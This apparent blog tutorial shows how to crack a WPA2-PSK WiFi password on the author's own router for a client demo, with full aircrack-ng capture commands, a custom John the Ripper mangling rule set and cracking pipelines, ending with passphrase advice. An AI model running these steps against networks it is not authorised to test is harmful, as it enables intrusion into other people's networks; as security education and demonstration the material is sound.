Cracking WPA2 Passwords

I wanted to demo for a client how easy it would be to crack a WiFi network with a simple password. So I setup a Linksys EA3500 router (flashed with LEDE) and configured it to use a variation (changed capitalization and punctuation on the end) on a simple password from Twitter's banned password list. Twitter's list is based on the top passwords they've seen overused. And it's short so it makes for fast cracking!

Also, NIST's new guidelines on passwords (NIST calls them memorized secrets) specifically recommend testing passwords against lists from previous password breaches (see section 5.1.1.2; because that's what an attacker will do).

Prerequisites

Hardware

To make WPA2 cracking work, you first need to make sure you have a compatible Wireless chipset in order to enter monitor mode to collect the necessary packets. Aircrack-ng has an extensive page describing this. I've had good luck using cards with Atheros or Intel chipsets in the past.

Software

You'll need to install the aircrack-ng package. For Fedora:

dnf install aircrack-ng

Collection

WPA2 passwords can only be cracked if you collect the handshake (4 packets to-from the router) when a device connects. Aircrack-ng has some fancy tools for forcing this to happen, but since this was a demo, I just had my smartphone connect when I needed it.

  1. First disable NetworkManager (and/or wpa_supplicant): systemctl stop NetworkManager.service This will release control of the wireless card so that we can manipulate it.
  2. Find out which interface is your wireless card: iwconfig and grab the interface name on the left. My output looks something like this:
lo        no wireless extensions.

enp1s11   no wireless extensions.

wls3      IEEE 802.11  ESSID:"MyHomeNetwork"  
          Mode:Managed  Frequency:2.437 GHz  Access Point: 12:34:56:78:9A:BC   
          Bit Rate=115.6 Mb/s   Tx-Power=14 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=56/70  Signal level=-54 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:35  Invalid misc:67   Missed beacon:0
  1. Now that we know my wireless card is wls3, we can use an aircrack-ng script to put the wireless card in monitor mode (so that it can be used to sniff all wireless packets): airmon-ng start wls3 Note that the interface name will change after this step!
  2. With monitor mode enabled, we now passively scan the airwaves. airodump-ng wls3mon
  3. airodump-ng is currently channel hopping to detect all possible wireless networks. We only want to target one of them. Take note in the airodump-ng output of the BSSID and channel number of the desired network. Hit CTRL-C to stop airodump.
  4. Run airodump-ng again, but with a filter in-place and to save the results: airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w TestWPA2 wls3mon airodump will save some data files in the current directory with the prefix "TestWPA2". airodump will append a number (starting at 01) to the end of each file. We'll need the packet capture file, "TestWPA2-01.cap" for the cracking later. (Note: If you ran airodump with '-w' multiple times, you may have more than '-01.cap' and need the other numbered PCAP files as well).
  5. Capture a handshake. It's at this point that I had my smartphone connect to the target network. In airodump, you should see a new station listing pop up.
  6. Once you have captured the authentication (airodump will visibly tell you by putting "WPA Handshake" on the top status line), you can stop the collection with CTRL-C.
  7. We don't need monitor mode anymore. You can disable it: airmon-ng stop wls3mon
  8. Re-enable the NetworkManager systemctl start NetworkManager.service

Cracking

Now that we have our data, we can crack off-line.

John the Ripper

The default packages for John the Ripper in most distributions are the stock Openwall free version. It seems like most development of new cracking features happens on the bleeding jumbo version (someone else has shared a great cheat sheet on how to build and operate John).

  1. git clone -b bleeding-jumbo https://github.com/magnumripper/JohnTheRipper.git
  2. cd JohnTheRipper/src
  3. ./configure
  4. Build the code make
  5. Build outputs are in ../run so cd ../run

John the Ripper Rules

I wanted John to try more variations than the default rules allowed. Specifically, I wanted it to toggle case of each letter (the default rules just do the first character) AND append punctuation and numbers to the end of each dictionary word. So I had to modify the rules a little bit.

John's rule language is not very clear... It's not obvious what is happening on each step. But between the official documentation and some examples. Here's what I added to my john.conf file (it's in the default run directory):

[List.Rules:Spotlight]
# Toggle case everywhere (up to length 8), assuming that certain case
# combinations were already tried.
-c T1 Q M T0 Q
-c T2 Q M T[z0] T[z1] Q
-c T3 Q M T[z0] T[z1] T[z2] Q
-c T4 Q M T[z0] T[z1] T[z2] T[z3] Q
-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] Q
-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] $[2!3957468.?0] Q
# The 'z' in [z0] tells the preprocessor to make 2 rules. One which
# toggles the case at 0 and the other at z (which appears to mean past
# the end of the string so it won't actually change anything)
-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] Q
-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] $[2!3957468.?0] Q
# The Q M at the beginning makes this rule terminate if there isn't
# something changed from the first command (i.e. the string is shorter
# than 8 characters or there is a punctuation or number there)
-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] Q
-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] $[2!3957468.?0] Q

Do the crack

  1. Grab a dictionary to crack with (like Twitter's banned list). These are all the passwords which we will try variations on.
  2. To enumerate all the passwords (just on stdout), execute ./john --config=john.conf --rules=Spotlight --wordlist=../../Downloads/twitter-banned.txt --stdout
  3. Now, send them to aircrack-ng: ./john --config=john.conf --rules=Spotlight --wordlist=../../Downloads/twitter-banned.txt --stdout | aircrack-ng TestWPA2-01.cap
  4. Or... bleeding jumbo also has WPA cracking support. But you have to do it in 2 steps:
    1. Extract the WPA handshakes: ./wpapcap2john ~/TestWPA2-01.cap > wpa.john.txt
    2. Now crack: ./john --config=john.conf --rules=Spotlight --wordlist=../../Downloads/twitter-banned.txt wpa.john.txt

Mitigation

WPA2 is really very secure... if a good password is used (and devices are updated against the KRACK attacks, but that's for another posting). If using the WPA2-PSK (the password/pre-shared key version), then make sure the password isn't on any standard dictionary. NIST recommends long passwords. I recommend passphrases (at least 4 words) with some mixed in punctuation.

Contact Us